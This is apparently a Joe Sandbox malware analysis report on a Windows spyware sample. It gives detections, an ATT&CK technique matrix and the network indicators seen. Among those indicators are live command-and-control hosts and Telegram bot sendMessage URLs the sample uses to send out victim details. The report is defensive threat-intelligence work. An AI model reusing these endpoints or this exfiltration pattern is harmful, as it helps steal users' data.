              Source: Yara matchFile source: 2.2.svchost.exe.7910000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326ff20.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326ff20.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7d00000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326f000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7910000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7910f20.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4526377595.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 428, type: MEMORYSTR
              Source: Yara matchFile source: 2.2.svchost.exe.7d00000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7910f20.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326f000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7910000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326ff20.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326ff20.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7d00000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326f000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7910000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7910f20.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4526377595.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 428, type: MEMORYSTR
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure2
              Valid Accounts
              2
              Native API
              1
              DLL Side-Loading
              1
              Exploitation for Privilege Escalation
              11
              Disable or Modify Tools
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Web Service
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault AccountsScheduled Task/Job2
              Valid Accounts
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              21
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              4
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
              Valid Accounts
              3
              Obfuscated Files or Information
              Security Account Manager2
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              11
              Encrypted Channel
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
              Access Token Manipulation
              1
              DLL Side-Loading
              NTDS127
              System Information Discovery
              Distributed Component Object Model21
              Input Capture
              3
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script312
              Process Injection
              2
              Valid Accounts
              LSA Secrets131
              Security Software Discovery
              SSH3
              Clipboard Data
              14
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
              Virtualization/Sandbox Evasion
              Cached Domain Credentials31
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
              Access Token Manipulation
              DCSync3
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job312
              Process Injection
              Proc Filesystem11
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
              System Network Configuration Discovery
              Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              9L83v5j083.exe71%VirustotalBrowse
              9L83v5j083.exe68%ReversingLabsWin32.Trojan.Leonem
              9L83v5j083.exe100%AviraHEUR/AGEN.1321703
              9L83v5j083.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              reallyfreegeoip.org
              104.21.32.1
              truefalse
                high
                api.telegram.org
                149.154.167.220
                truefalse
                  high
                  checkip.dyndns.com
                  193.122.6.168
                  truefalse
                    high
                    241.42.69.40.in-addr.arpa
                    unknown
                    unknownfalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          high
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:287400%0D%0ADate%20and%20Time:%2011/01/2025%20/%2001:48:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20287400%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            high
                            http://checkip.dyndns.org/false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.office.com/svchost.exe, 00000002.00000002.4526971369.000000000551B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.000000000550C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.0000000005479000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/chrome_newtabsvchost.exe, 00000002.00000002.4528192368.0000000006638000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4528192368.00000000063F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://duckduckgo.com/ac/?q=svchost.exe, 00000002.00000002.4528192368.0000000006638000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4528192368.00000000063F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.orgsvchost.exe, 00000002.00000002.4526971369.0000000005456000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icosvchost.exe, 00000002.00000002.4528192368.0000000006638000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4528192368.00000000063F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.org/botsvchost.exe, 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526377595.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.0000000005456000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmpfalse
                                          high
                                          https://chrome.google.com/webstore?hl=enhZsvchost.exe, 00000002.00000002.4526971369.00000000054DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.office.com/lBsvchost.exe, 00000002.00000002.4526971369.0000000005516000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=svchost.exe, 00000002.00000002.4528192368.0000000006638000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4528192368.00000000063F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://checkip.dyndns.orgsvchost.exe, 00000002.00000002.4526971369.0000000005371000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=svchost.exe, 00000002.00000002.4528192368.0000000006638000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4528192368.00000000063F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=svchost.exe, 00000002.00000002.4526971369.0000000005456000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://chrome.google.com/webstore?hl=ensvchost.exe, 00000002.00000002.4526971369.00000000054EA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.0000000005479000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.ecosia.org/newtab/svchost.exe, 00000002.00000002.4528192368.0000000006638000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4528192368.00000000063F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://varders.kozow.com:8081svchost.exe, 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526377595.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.0000000005371000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://aborters.duckdns.org:8081svchost.exe, 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526377595.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.0000000005371000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://ac.ecosia.org/autocomplete?q=svchost.exe, 00000002.00000002.4528192368.0000000006638000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4528192368.00000000063F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://anotherarmy.dns.army:8081svchost.exe, 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526377595.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.0000000005371000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsvchost.exe, 00000002.00000002.4528192368.0000000006638000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4528192368.00000000063F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://checkip.dyndns.org/qsvchost.exe, 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526377595.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                      high
                                                                      https://chrome.google.com/webstore?hl=enlsvchost.exe, 00000002.00000002.4526971369.00000000054EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.office.com/lsvchost.exe, 00000002.00000002.4526971369.000000000551B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://chrome.google.com/webstore?hl=enlBsvchost.exe, 00000002.00000002.4526971369.00000000054E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://reallyfreegeoip.org/xml/8.46.123.189$svchost.exe, 00000002.00000002.4526971369.00000000053E8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.0000000005456000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.000000000542E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://reallyfreegeoip.orgsvchost.exe, 00000002.00000002.4526971369.0000000005456000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.00000000053BE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.000000000542E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.office.com/hZsvchost.exe, 00000002.00000002.4526971369.000000000550C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:287400%0D%0ADate%20asvchost.exe, 00000002.00000002.4526971369.0000000005456000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namesvchost.exe, 00000002.00000002.4526971369.0000000005371000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=svchost.exe, 00000002.00000002.4528192368.0000000006638000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4528192368.00000000063F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedsvchost.exe, 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526377595.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://reallyfreegeoip.org/xml/svchost.exe, 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526377595.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.00000000053BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs
                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            149.154.167.220
                                                                                            api.telegram.orgUnited Kingdom
                                                                                            62041TELEGRAMRUfalse
                                                                                            104.21.32.1
                                                                                            reallyfreegeoip.orgUnited States
                                                                                            13335CLOUDFLARENETUSfalse
                                                                                            193.122.6.168
                                                                                            checkip.dyndns.comUnited States
                                                                                            31898ORACLE-BMC-31898USfalse
                                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                                            Analysis ID:1588012
                                                                                            Start date and time:2025-01-10 20:32:29 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 8m 27s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:5
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:9L83v5j083.exe
                                                                                            renamed because original name is a hash value
                                                                                            Original Sample Name:909a74c7a03956c55492863028a975ccf0917f54fab5d4fa8cfa2bfa8e480ed9.exe
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.spyw.evad.winEXE@3/2@4/3
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            • Number of executed functions: 52
                                                                                            • Number of non-executed functions: 303
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe
                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200, 40.69.42.241
                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                            TimeTypeDescription
                                                                                            14:33:25API Interceptor11009910x Sleep call for process: svchost.exe modified
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            149.154.167.220y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                          YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                104.21.32.1QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                                                • www.mzkd6gp5.top/3u0p/
                                                                                                                SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                • redroomaudio.com/administrator/index.php
                                                                                                                193.122.6.168FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                • checkip.dyndns.org/
                                                                                                                m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                • checkip.dyndns.org/
                                                                                                                FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • checkip.dyndns.org/
                                                                                                                fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • checkip.dyndns.org/
                                                                                                                RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • checkip.dyndns.org/
                                                                                                                YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • checkip.dyndns.org/
                                                                                                                AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • checkip.dyndns.org/
                                                                                                                SBkuP3ACSA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • checkip.dyndns.org/
                                                                                                                ql8KpEHT7y.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • checkip.dyndns.org/
                                                                                                                8kDIr4ZdNj.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • checkip.dyndns.org/
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                reallyfreegeoip.orgy1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 104.21.80.1
                                                                                                                FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                • 104.21.64.1
                                                                                                                ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                • 104.21.96.1
                                                                                                                CvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                • 104.21.32.1
                                                                                                                m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                • 104.21.96.1
                                                                                                                FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 104.21.96.1
                                                                                                                jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 104.21.96.1
                                                                                                                fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.96.1
                                                                                                                RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.16.1
                                                                                                                YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.112.1
                                                                                                                checkip.dyndns.comy1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 193.122.130.0
                                                                                                                FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                • 193.122.6.168
                                                                                                                ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                • 132.226.8.169
                                                                                                                CvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                • 132.226.8.169
                                                                                                                m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                • 193.122.6.168
                                                                                                                FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 193.122.6.168
                                                                                                                jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 158.101.44.242
                                                                                                                fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 132.226.247.73
                                                                                                                RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 193.122.6.168
                                                                                                                YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 193.122.6.168
                                                                                                                api.telegram.orgy1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 149.154.167.220
                                                                                                                FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                • 149.154.167.220
                                                                                                                ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                • 149.154.167.220
                                                                                                                m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                • 149.154.167.220
                                                                                                                fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 149.154.167.220
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                ORACLE-BMC-31898USy1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 193.122.130.0
                                                                                                                FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                • 193.122.6.168
                                                                                                                m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                • 193.122.6.168
                                                                                                                FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 193.122.6.168
                                                                                                                jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 158.101.44.242
                                                                                                                fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 193.122.6.168
                                                                                                                RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 193.122.6.168
                                                                                                                YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 193.122.6.168
                                                                                                                AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 193.122.6.168
                                                                                                                MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 158.101.44.242
                                                                                                                TELEGRAMRUy1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 149.154.167.220
                                                                                                                FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                • 149.154.167.220
                                                                                                                ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                • 149.154.167.220
                                                                                                                m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                • 149.154.167.220
                                                                                                                fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
